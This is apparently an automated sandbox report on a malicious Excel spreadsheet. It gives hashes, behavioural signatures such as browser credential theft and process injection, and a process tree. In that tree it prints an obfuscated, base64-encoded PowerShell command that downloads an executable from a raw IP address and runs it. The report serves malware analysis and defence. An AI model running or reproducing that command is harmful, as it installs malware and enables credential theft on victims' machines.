Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
29-08-2024 07:40
Static task
static1
Behavioral task
behavioral1
Sample
Paul Agrotis List.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Paul Agrotis List.xls
Resource
win10v2004-20240802-en
General
-
Target
Paul Agrotis List.xls
-
Size
556KB
-
MD5
3fa527af991027a0f082e2fe770707cd
-
SHA1
f763dc4f81db46a2d041c6f1deb963e41cca8eb2
-
SHA256
faceb2153727b13a35f7df8b798aa1c9ab24033b849f19575b246f64bb6929ed
-
SHA512
88dbc671f97c80aa8d041b2dee4fda1d5a7c59e88ce0392967a00fbba8db55e6a8c18f27e1a2de4d4d3eb528976e0c719ca8ebac9bb563dd5faecd7e05efb253
-
SSDEEP
12288:p+62JewkgKFQzhrewDadA5rFU53sYHOXHQ0yPK6XVuK2:pp7H8rBgAtAHmw0yP9sK
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 3044 2180 odbcconf.exe 30 -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 12 2576 mshta.exe 13 2576 mshta.exe 15 2496 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2496 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1872 MeMpEng.exe -
Loads dropped DLL 2 IoCs
pid Process 2496 powershell.exe 3044 odbcconf.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001872a-61.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1872 set thread context of 2672 1872 MeMpEng.exe 40 PID 2672 set thread context of 2180 2672 svchost.exe 30 PID 2672 set thread context of 3044 2672 svchost.exe 41 PID 3044 set thread context of 2180 3044 odbcconf.exe 30 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeMpEng.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language odbcconf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \Registry\User\S-1-5-21-2958949473-3205530200-1453100116-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 odbcconf.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2180 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2496 powershell.exe 2496 powershell.exe 2496 powershell.exe 2672 svchost.exe 2672 svchost.exe 2672 svchost.exe 2672 svchost.exe 3044 odbcconf.exe 3044 odbcconf.exe 3044 odbcconf.exe 3044 odbcconf.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1872 MeMpEng.exe 2672 svchost.exe 2180 EXCEL.EXE 2180 EXCEL.EXE 3044 odbcconf.exe 3044 odbcconf.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2496 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1872 MeMpEng.exe 1872 MeMpEng.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1872 MeMpEng.exe 1872 MeMpEng.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE 2180 EXCEL.EXE -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 2576 wrote to memory of 2640 2576 mshta.exe 33 PID 2576 wrote to memory of 2640 2576 mshta.exe 33 PID 2576 wrote to memory of 2640 2576 mshta.exe 33 PID 2576 wrote to memory of 2640 2576 mshta.exe 33 PID 2640 wrote to memory of 2496 2640 cmd.exe 35 PID 2640 wrote to memory of 2496 2640 cmd.exe 35 PID 2640 wrote to memory of 2496 2640 cmd.exe 35 PID 2640 wrote to memory of 2496 2640 cmd.exe 35 PID 2496 wrote to memory of 1840 2496 powershell.exe 36 PID 2496 wrote to memory of 1840 2496 powershell.exe 36 PID 2496 wrote to memory of 1840 2496 powershell.exe 36 PID 2496 wrote to memory of 1840 2496 powershell.exe 36 PID 1840 wrote to memory of 1844 1840 csc.exe 37 PID 1840 wrote to memory of 1844 1840 csc.exe 37 PID 1840 wrote to memory of 1844 1840 csc.exe 37 PID 1840 wrote to memory of 1844 1840 csc.exe 37 PID 2496 wrote to memory of 1872 2496 powershell.exe 39 PID 2496 wrote to memory of 1872 2496 powershell.exe 39 PID 2496 wrote to memory of 1872 2496 powershell.exe 39 PID 2496 wrote to memory of 1872 2496 powershell.exe 39 PID 1872 wrote to memory of 2672 1872 MeMpEng.exe 40 PID 1872 wrote to memory of 2672 1872 MeMpEng.exe 40 PID 1872 wrote to memory of 2672 1872 MeMpEng.exe 40 PID 1872 wrote to memory of 2672 1872 MeMpEng.exe 40 PID 1872 wrote to memory of 2672 1872 MeMpEng.exe 40 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41 PID 2180 wrote to memory of 3044 2180 EXCEL.EXE 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Paul Agrotis List.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\odbcconf.exe"C:\Windows\SysWOW64\odbcconf.exe"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3044
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWersheLL -EX BypASs -Nop -w 1 -c DEViCECREdENtiALDEPloyMeNT ; Iex($(iEX('[SystEM.tExt.eNcodiNG]'+[cHar]58+[chAR]58+'uTF8.geTsTrInG([SyStEm.COnveRt]'+[CHAR]0x3A+[cHAR]0X3a+'fRomBaSe64strIng('+[ChAr]34+'JFZTSlR6c2duMiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkZUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJnRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2J6aCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTlMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMR2ZDbWRhc3lILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Wk9Dayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidXVXIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVaYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWU0pUenNnbjI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMy4zOS4xNjAuMTI5LzUwL01FbXBFbmcuZXhlIiwiJEVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJULXNsRWVQKDMpO3N0QXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chAr]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWersheLL -EX BypASs -Nop -w 1 -c DEViCECREdENtiALDEPloyMeNT ; Iex($(iEX('[SystEM.tExt.eNcodiNG]'+[cHar]58+[chAR]58+'uTF8.geTsTrInG([SyStEm.COnveRt]'+[CHAR]0x3A+[cHAR]0X3a+'fRomBaSe64strIng('+[ChAr]34+'JFZTSlR6c2duMiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRXJkZUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJnRCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2J6aCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTlMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMR2ZDbWRhc3lILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5Wk9Dayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidXVXIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVaYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRWU0pUenNnbjI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMy4zOS4xNjAuMTI5LzUwL01FbXBFbmcuZXhlIiwiJEVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJULXNsRWVQKDMpO3N0QXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chAr]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l-bvrroz.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEF8E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEF8D.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1844
-
-
-
C:\Users\Admin\AppData\Roaming\MeMpEng.exe"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2672
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
344B
MD52a22d79f810194591562f5550fd2fdaf
SHA19085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5677bb434b51fcd818c5bf07dbe742f13
SHA1a838dbe9031fc00a5acf46793c7e7dd9fce141aa
SHA25669d4900e7a2d36625261def88dbbd526d85d7277f28c93c04a8f4e1551cb212d
SHA51248bba373580ff3f4de18b0452044c8cce2b2e3d9f9ea760e877d371d624d2e3360ff57a02115d8aa35c058784e4e5636c176d4dc5e7d74426fbece2169a872f5
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808
Filesize544B
MD5b436247d10de6475bf85ceba4d5c7207
SHA1d10f10b731c8b960f6713486146264c089676a27
SHA25682ca1d05e89893e832b0933cd972212c3b68f99d70d19fba683d20fb1492e263
SHA5124b6526f14347d26a13da9e4dc8bf4c7d69b3b2674e9c3752209de2d810630f9a8a03a082396cb156107045894453bea2ed0c81ade29ebdaea66be980446114a5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\IEnetcode[1].hta
Filesize8KB
MD5701257a623929f04b7d533e62e5ecaa6
SHA18ad86b3c2904090761cf990baef430bd7050b4e7
SHA256682dcbdab1bad063986d38181efb5232420ab0cbaf1ab316b171fbdb743abcde
SHA512eceeebdc0c38b66cede9716571066830bff3347079d3d56a59c43b5e4eaef42e49dd682957a3fa4272e0502701e79c55ee58047a2a830a790a71de7ba4a48d42
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5d9a90ada4db8ba58268479f3af653765
SHA1e0590ca313cc88b2031583d464c01e65a1681ad1
SHA25667b93776a07aa5564fefed06fa4cefbfe79b09c895a4e39f2095a52e5d71c045
SHA512e8cf29161fbea78e1a2b8dc0d572121b5a588e02566910bc9bad52f0ac399ea9c65bf887ba7d3b36e64b314c24db9d524abfcbe1bd9b6248811c6fa72018d4a2
-
Filesize
434KB
MD56366b1751087ba991f1b4188a3f38486
SHA1449fab91dcd435e62a96dc4b400671ba0460a84a
SHA2563102600d3ad67b0e3f132bc0f8e0e66d976ba3700c3cc96459b65a87fa57c373
SHA512e1a8eb6dcfe0732299ccf74a0e61acbd132da4abac8aad996c2ba481328c0671530a55347f694f23a01a40e2343976196fc09fdd4573ab996a8a88d8e7693b90
-
Filesize
3KB
MD58c48c7eb1aecd36bc822bd2948e1c2a2
SHA19b34bed52dc797211d03304014cd0c5dff7a0028
SHA25626643ce7f53c0acea90ea1a8358b5032e2e51978d1b212520dc367be80caa023
SHA51236a6cc0f411a1402aec923a243abc92f27588eca4f0e8a8a051559a18c4c4427116197863968edea123a495ffa38f230323971f2b42c72bf9aa802944c6e0616
-
Filesize
7KB
MD5dfcb92947dbb470a904e0fa0e9fca817
SHA139b1530b813709332ec13ae02d97599e7a99b925
SHA2566cfeffc9457f331c2a2f13f416165c23569b3d26fb0da86f58fdef2262bc9924
SHA512cc5d947990bbf8da03a7fc564a7063da1b14c6c0f852a3f4fea3b1aa49906368a3f2cf3f984c3824ecde80c966b7d33d29d30e3302a7387bcde1d951c5188279
-
Filesize
282KB
MD5431b3897d936b5f8c0294e0b8cc2e787
SHA1b354ef427a461175729eeaafd16225ecea7a967b
SHA256cd638988342b9788959a1340ead817c5f467220fc6998fa0ae08f18d228d2ca4
SHA5126d36400f691624b639cc54479ef47d0b9382a4bf1b6d4e6602545ac6d888d4c3fa29a98b73287b702b380a8283e781b8cad230322080b017db1aa10711267830
-
Filesize
1.1MB
MD50e298dba895de38e20bb91cf16ecd580
SHA1645c3a7328087ef2c00e74ce3a8e4c38d940ec99
SHA256878d1a19f6c537ecf0235760fe5c26dc932e9187e0f59971c007dc1042e9d4f8
SHA512e779d119237f380585fb84fcf3eec78c6c84d44d78b3d0cd4c110dd546f9ad5f64d0a2081d0c4471f091050f0a8a6f4b3b7737850e85cd75d739fd5b778e16d5
-
Filesize
652B
MD5146228c556fa026f297153c778c1f6ba
SHA1015af0e0f050c078e9c47699603aac23ca5a3d8c
SHA25679d0fdf6dca61ff11b531bdfffe6af457a2f8dea0d53d38cd16c0460e12e03c2
SHA512aad7d384c65edea68e6e79206cb095cf09e19167ca226d3c68069d3c4512a149a66ab976af104d111d05ad7c4eea96a2088f456c3811e02572329cf1aadabe63
-
Filesize
451B
MD58cf81169b8613ad8a05be07631bc684d
SHA12fcc43b4cbf17036c9fb697861a81105a90f1691
SHA256d7b717eb0b7f66d8aaad7773b16604059888221803c513bd5b64ba93e3a387ca
SHA512ab9631d9e7f33f9162b07379c7eb5cc4e5a28cb1dfb897c13f886a986b33e559380b8c14265ba42974a124241f52bc95f7c479384710caa8d940dc7641d82325
-
Filesize
309B
MD5a1f2ecf24420a0f4f9dd4bb7bd90fc6b
SHA1ad53f5d7de76f0d82c4e8c75339bdeb487bd4658
SHA256096008ea6079d060d6df2083c5905f1eafc4055794857e4421f3c00849d935cd
SHA512a1b3560fb2aeb8ad328d52d5627a4a2f5d91d9d3e3d90e857bc4f6a4ba46dec3fdd82035a69807cf7c35024b78b0cfc5d873e7eff08b34acbe60e01c4806b70b
-
Filesize
831KB
MD5f4d8be409d1bd016a7b3b2580a2b90fb
SHA1a68e1f6a9b2234f2269d9cf1fbda94124c428dbe
SHA256d70b27121bb33012560b14a7bd597666d76193d7dc5f89e2ac5e7507240bf708
SHA5129892cd38d77898fe7916a8810c82a377bbcb4f0c3f75a8295943fa29a5cb4daec95a1600a74614f31ec723967fd95721174042f2e54b12e52fe85202cdf052df